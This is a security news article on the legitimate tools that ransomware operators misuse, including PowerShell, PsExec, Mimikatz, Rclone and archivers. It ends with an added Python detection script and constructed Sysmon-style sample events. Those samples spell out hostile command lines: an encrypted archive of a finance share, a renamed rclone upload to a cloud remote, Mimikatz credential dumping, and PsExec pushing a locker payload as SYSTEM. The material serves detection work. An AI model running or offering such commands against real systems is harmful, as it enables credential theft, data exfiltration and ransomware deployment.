Wednesday, December 11, 2024

Hackers Use Number of Legitimate Tools in Ransomware Attacks

Ransomware attacks remain a formidable challenge for organizations worldwide.

These attacks not only encrypt critical data, rendering it inaccessible to its rightful owners, but increasingly also involve the exfiltration of sensitive information.

This dual-threat approach amplifies the potential damage, as attackers not only demand ransom for the decryption key but also threaten to release the stolen data unless additional payment is made.

A critical aspect of these attacks that often goes unnoticed is the use of legitimate tools by hackers to carry out their nefarious activities.

A report by Symantec researchers examines this phenomenon and lists the tools most commonly repurposed by cybercriminals.

Data exfiltration refers to the unauthorized transfer of data from a computer or server.

In the context of ransomware attacks, it serves a dual purpose.

First, it adds an extra layer of coercion, as the attackers threaten to publish the stolen data if their demands are not met.

Second, it provides an additional revenue stream, as the data can be sold on the dark web or used in further targeted attacks.

The sophistication of these operations has increased, with attackers leveraging legitimate administrative and security tools to avoid detection and facilitate their malicious activities.

List of Legitimate Tools Used in Ransomware Attacks

The use of legitimate tools by hackers complicates the detection and prevention of ransomware attacks.

These tools, designed for system administration, network management, and security assessments, are repurposed to conduct reconnaissance, gain persistence, escalate privileges, and exfiltrate data, the Symantec report notes.

PowerShell: A powerful scripting language and command-line shell, PowerShell is often used by attackers for its ability to execute scripts and commands across the network, automate tasks, and manage configurations.

Its presence on every modern Windows system makes it a favored tool for running post-compromise tooling and moving laterally across networks; encoded (-EncodedCommand) and hidden-window invocations are the usual giveaways, and script block logging (Event ID 4104) records what actually ran.

PsExec: Part of the Sysinternals Suite, PsExec allows administrators to execute processes on other systems remotely. It works by copying a service binary to the target over SMB and starting it as the PSEXESVC service.

Hackers use it to push malware across networked computers and execute ransomware payloads, often as SYSTEM (the -s switch). The PSEXESVC service it installs on each target is a useful detection artifact.

Mimikatz: This open-source utility is designed to extract plaintext passwords, password hashes, PINs, and Kerberos tickets from memory.

Attackers commonly use Mimikatz to escalate privileges and gain access to high-value targets within the network.

Cobalt Strike: Although intended as a security tool for penetration testers, Cobalt Strike has been adopted by cybercriminals for its robust set of features for network reconnaissance, exploitation, and the deployment of payloads.

Its Beacon payload is the component used to maintain command-and-control communication with compromised systems.

Rclone: Rclone is a command-line program for managing files on cloud storage. It has been repurposed by attackers for data exfiltration, leveraging its ability to efficiently transfer large volumes of data to cloud services under their control. Because it authenticates to the provider with ordinary credentials and uses HTTPS, the upload blends in with legitimate cloud traffic; a command line naming a remote such as `name:path` is the thing to look for.

7-Zip: A file archiver with a high compression ratio, 7-Zip is used by attackers to compress stolen data before exfiltration, typically with a password (-p) so the archive is encrypted.

This reduces the bandwidth required for the transfer and helps evade detection: a single encrypted archive replaces many individual file transfers, and content inspection at the egress point cannot see inside it.

WinRAR: Similar to 7-Zip, WinRAR is another compression tool used to package data before exfiltration.

Its widespread use and support for various compression formats make it a versatile tool for attackers.

Advanced IP Scanner: This network scanner allows for quick identification of all devices on a network.

Attackers use it to map out the network, identify potential targets, and plan their attack vectors.

The use of legitimate tools in ransomware attacks presents a unique challenge for cybersecurity professionals.

These tools are often allowlisted within organizations, so their execution alone raises no alarm and malicious use is harder to detect.

This underscores the importance of robust endpoint and network monitoring that looks at how a tool is invoked rather than merely whether it ran, the principle of least privilege, and continuous education on the evolving tactics of cyber adversaries.
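As an added example (not code from the article or from the Symantec report), the Python script below shows what that monitoring looks like in practice: one detection rule per tool family discussed above, run over constructed Sysmon-style process-creation events, plus a correlation step that ties an encrypted archive to a following rclone upload on the same host. Matching on the PE OriginalFileName that Sysmon records (for PsExec this is `psexec.c`) means a renamed copy is still attributed to the right tool, which matters precisely because the tools themselves are allowlisted. The field names and every event in SAMPLE_EVENTS are assumptions constructed for the example.

```python
"""Detection rules for living-off-the-land tools in ransomware intrusions.

Added example, not code from the article or the Symantec report. Field
names (host, time, user, image, original_file_name, command_line) are an
assumption modelled on Sysmon Event ID 1; SAMPLE_EVENTS is constructed
for the example, not captured from a real incident.
"""
import re
from datetime import datetime, timedelta

# Lower-cased binary names mapped to a tool family. Entries also cover the
# PE OriginalFileName Sysmon records, so a renamed copy is still matched
# (PsExec's OriginalFileName is "psexec.c", not "psexec.exe").
TOOL_FAMILY = {
    "rclone.exe": "rclone",
    "7z.exe": "archiver", "7za.exe": "archiver", "7zg.exe": "archiver",
    "winrar.exe": "archiver", "rar.exe": "archiver",
    "psexec.exe": "psexec", "psexec64.exe": "psexec", "psexec.c": "psexec",
    "advanced_ip_scanner.exe": "ipscanner",
    "mimikatz.exe": "mimikatz",
    "powershell.exe": "powershell", "pwsh.exe": "powershell",
}

# rclone remotes look like "name:path". A Windows drive is a single letter
# followed by a backslash, so require two or more name characters and no
# path separator after the colon.
RCLONE_REMOTE = re.compile(r"(?<![\w\\])[a-z][\w-]+:(?![\\/])")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return a finding dict for one process-creation event, or None."""
    image = _basename(ev["image"])
    orig = (ev.get("original_file_name") or "").lower()
    family = TOOL_FAMILY.get(image) or TOOL_FAMILY.get(orig)
    if family is None:
        return None
    cmd, low = ev["command_line"], ev["command_line"].lower()
    tag, sev = None, 0
    if family == "rclone" and re.search(r"\b(copy|sync|move)\b", low) and RCLONE_REMOTE.search(low):
        tag, sev = "exfil_transfer", 8
    elif family == "archiver" and re.search(r"(^|\s)a\s", low):
        # "a" adds files to an archive; -p / -hp encrypt it (typical of staging)
        tag, sev = "archive_staging", 4 + (2 if re.search(r"\s-h?p", low) else 0)
    elif family == "psexec" and re.search(r"\\\\\S+", cmd):
        # \\host target; -s runs the payload as SYSTEM on the remote machine
        tag, sev = "lateral_movement", 7 + (1 if re.search(r"\s-s\b", low) else 0)
    elif family == "ipscanner":
        tag, sev = "network_recon", 4
    elif family == "mimikatz" or "sekurlsa" in low:
        tag, sev = "credential_theft", 9
    elif family == "powershell" and (
        re.search(r"\s-e(c|nc|ncodedcommand)?\s", low)
        or re.search(r"\s-w(indowstyle)?\s+hidden", low)
    ):
        tag, sev = "suspicious_powershell", 5
    if tag is None:
        return None
    # A known tool running under a different file name is a strong signal.
    renamed = orig in TOOL_FAMILY and image not in TOOL_FAMILY
    return {"host": ev["host"], "time": ev["time"], "user": ev["user"], "image": image,
            "tag": tag, "renamed": renamed, "severity": min(10, sev + (2 if renamed else 0))}


def analyze(events, window=timedelta(hours=1)):
    """Classify every event, then correlate an archive staging event followed
    within `window` by an rclone transfer on the same host into one
    high-severity finding (the stage-then-exfiltrate pattern)."""
    findings = [f for f in (classify(e) for e in events) if f]
    staged = []
    for s in [f for f in findings if f["tag"] == "archive_staging"]:
        for t in [f for f in findings if f["tag"] == "exfil_transfer" and f["host"] == s["host"]]:
            delta = datetime.fromisoformat(t["time"]) - datetime.fromisoformat(s["time"])
            if timedelta(0) <= delta <= window:
                staged.append({**t, "tag": "staged_exfiltration", "severity": 10})
    return sorted(findings + staged, key=lambda f: (f["host"], f["time"], f["tag"]))


# Constructed sample events (not real telemetry); the last two are benign.
SAMPLE_EVENTS = [
    {"host": "FS01", "time": "2024-12-10T22:03:11", "user": "CORP\\svc_backup",
     "image": "C:\\Windows\\Temp\\7z.exe", "original_file_name": "7z.exe",
     "command_line": "7z.exe a -pS3cret! -mhe=on C:\\Windows\\Temp\\fin.7z D:\\Shares\\Finance"},
    {"host": "FS01", "time": "2024-12-10T22:41:57", "user": "CORP\\svc_backup",
     "image": "C:\\Windows\\Temp\\svchost.exe", "original_file_name": "rclone.exe",
     "command_line": "svchost.exe copy C:\\Windows\\Temp\\fin.7z mega:dump --transfers 16 -q"},
    {"host": "WS12", "time": "2024-12-10T19:58:40", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\Downloads\\Advanced_IP_Scanner.exe",
     "original_file_name": "advanced_ip_scanner.exe", "command_line": "Advanced_IP_Scanner.exe"},
    {"host": "WS12", "time": "2024-12-10T20:01:00", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEA"},
    {"host": "WS12", "time": "2024-12-10T20:10:22", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\mimikatz.exe", "original_file_name": "mimikatz.exe",
     "command_line": "mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"host": "WS12", "time": "2024-12-10T20:15:02", "user": "CORP\\jdoe",
     "image": "C:\\Tools\\PsExec.exe", "original_file_name": "psexec.c",
     "command_line": "PsExec.exe \\\\FS01 -s -c -f C:\\Tools\\locker.exe"},
    {"host": "WS12", "time": "2024-12-10T18:30:00", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "command_line": "powershell.exe Get-ChildItem C:\\Users\\jdoe\\Documents"},
    {"host": "FS01", "time": "2024-12-10T09:00:00", "user": "CORP\\admin",
     "image": "C:\\Program Files\\7-Zip\\7z.exe", "original_file_name": "7z.exe",
     "command_line": "7z.exe x C:\\Installers\\package.7z -oC:\\Installers"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['host']} {f['time']} sev={f['severity']:2d} {f['tag']:22s} {f['image']}"
              + (" (renamed)" if f["renamed"] else ""))
```

The rules deliberately key on how each binary is invoked rather than on its presence: an archiver extracting an installer and an administrator's interactive PowerShell produce no finding, while `rclone copy` to a named remote, an encrypted `7z a`, and `PsExec \\host -s` do. The rename check raises severity when the file name on disk does not match the OriginalFileName of a known tool, and the correlation step is what turns two medium-severity events on a file server into the single incident that actually matters.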

By understanding the tools and methods used by attackers, organizations can better prepare their defenses against the multifaceted threat of ransomware.

Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
